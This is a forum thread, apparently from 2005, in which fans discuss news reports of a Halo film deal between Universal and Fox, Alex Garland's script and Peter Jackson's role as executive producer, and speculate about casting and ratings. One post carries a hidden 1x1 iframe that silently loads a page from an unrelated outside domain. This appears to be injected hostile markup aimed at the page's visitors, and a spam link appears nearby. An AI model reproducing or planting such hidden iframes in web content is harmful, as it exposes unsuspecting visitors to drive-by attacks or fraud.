Thanks Thanks:  0
Page 1 of 3 123 LastLast
    Credits

Talking "Halo" movie deal in talks

Source: www.scifi.com

Universal Pictures and 20th Century Fox are mulling a deal to co-finance a movie based on Microsoft's Halo video-game franchise, written by Alex Garland (28 Days Later), Variety reported. People familiar with the talks told the trade paper that Universal is leading the way on a deal that would divide the film's cost on a 50-50 basis between Fox and Universal; the former would take international distribution, and the latter would handle domestic distribution. Financial details were still being worked out, the trade paper reported.

Microsoft initially demanded a $10 million up-front payment and 15 percent of the gross; that's believed to have been whittled down to $5 million, the trade paper reported. The company's insistence on a January production start may also be jettisoned and replaced with a promise simply to get the movie into theaters by 2007 at the latest.
    Wonder if it'll be live-action or cgi?
    Our greatest accomplishments cannot be behind us, because our destiny lies above us. - Matthew Mcconaughey - Interstellar

Credits
    Well a live action would be far more spectacular....and exciting....and very R rated (or MA here)!

So yeah, live action would be much more kickass!
    "They took the sky, but we're still flyin..."

Movieman's DVDanswers.com Review Page

Credits
    would love to see Ron Perlman being a part of this movie, if not a main role.. den defo a small cameo!

Credits
    im just hoping if they do it live they dont screw it up

Credits
    I've been following this a little and this doesn't look like it's going to happen. I read an article in The New York Times or The Wall Street Journal (can't remember which) that said that Microsoft was making crazy demands. Also I read that the script is complete **** and most of the studios dropped out of bidding after only 48 hours since they got the script.

Credits
    it has to be real since Bungie have read the script and said that Alex Garland (http://www.imdb.com/name/nm0307497/) will be writing the script.
    /!\ Certified Bandwidth Abuser || ([)(]) Dolby Digital me bitch! || Alicia Keys || Game Trailers || FaceBook user ||
    || All-time Favourite TV Shows: Battlestar Galactica (2003+), Dead Like Me, FireFly, Invader ZIM, Space: Above & Beyond, Veronica Mars ||

[ -- Music Festival Whore! -- ]

Credits
    If they make this film, it has to be insanely awesome.

Otherwise, I fear it would ruin the game name.

Credits

game movie

how will be in main role

http://www.intraactionindia.com

Credits
    What.... I don't get it.

Credits

Bah

Unoriginal game = unoriginal movie. I hope they don't waste the production time/money and screen time.

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>

Credits

Talking Halo movie deal finalized!!!

From scifiwire:

Fox and Universal have closed their deal to make a movie based on Microsoft's hit video game Halo, with plans to release it in 2007, Variety reported. Universal will oversee the production and is handling domestic distribution, while Fox will take foreign distribution. The studios will split revenues 50-50 out of a shared pot, the trade paper reported.

Former Columbia president Peter Schlessel, who served as a Hollywood liaison for Microsoft, is producing. 28 Days Later writer Alex Garland was paid $1 million by Microsoft to write a script that met its approval. He'll now do a rewrite with studio notes, after which Universal will go out to directors.

Microsoft is guaranteed extensive consultation on the project, but won't have approval over any elements. Several employees at Bungie, the Microsoft-owned development studio that created Halo, will serve as Microsoft's creative consultants.

Credits
    Please edit thread title, no more talk, it's official

From MarketWatch
    ACADEMY AWARD(R) WINNERS PETER JACKSON AND FRAN WALSH TO EXECUTIVE PRODUCE HALO FOR THE BIG SCREEN FOR SUMMER 2007
    Creatures, Miniatures and Visual Effects To Be Created by Weta Workshop Ltd. and Weta Digital Ltd.
    10/4/2005 3:45:45 PM

LOS ANGELES, Oct 04, 2005 /PRNewswire via COMTEX/ -- Universal Pictures and Twentieth Century Fox announced today that triple-Academy Award(R) winners Peter Jackson and Fran Walsh will serve as the executive producers of HALO(R), the upcoming feature film based on Microsoft's phenomenally popular video game from Bungie Studios. Jackson and Walsh will provide creative counsel on all aspects of the film via their WingNut Films banner, and Jackson's award-winning companies Weta Digital Ltd. and Weta Workshop Ltd. will provide creatures, miniatures and visual effects for the production. The HALO agreement marks the first time that Jackson and Walsh have performed these services on a major studio film that Jackson is not directing.
    The film is currently targeted for a Summer 2007 worldwide release. Universal will handle domestic distribution of the film, and Fox will handle the international release.
    So I guess it will be heavily computerized since Jackson is in on this

Credits
    Quote Originally Posted by Movieman
    Well a live action would be far more spectacular....and exciting....and very R rated (or MA here)!
    i doubt very much it would be rated R, there hasnt been a decent R movie in a long time, i'd say it would be PG

Credits
    It 100% won't be rated R, PG13 at most, why? Because they want the people who played Halo to watch it over and over. While I understand that many many adults play this game,(as do I) I think it's still MOST popular among kids.

To be quite honest I find this idea questionable. Mostly because I loved this gam e and Hollywood tends to **** this kind of stuff up. What is the plot of the movie? There aren't any real characters in Halo. It's what? Master Chief, his little Jimminy Cricket, and a few soldiers who die very quickly? I just hope they don't make as many changes as Doom

Credits
    Well with Jackson in charge and Weta Workshop doing the effects, at least we can look foward to it looking good. I forsee LOTS of eye candy.

Page 1 of 3 123 LastLast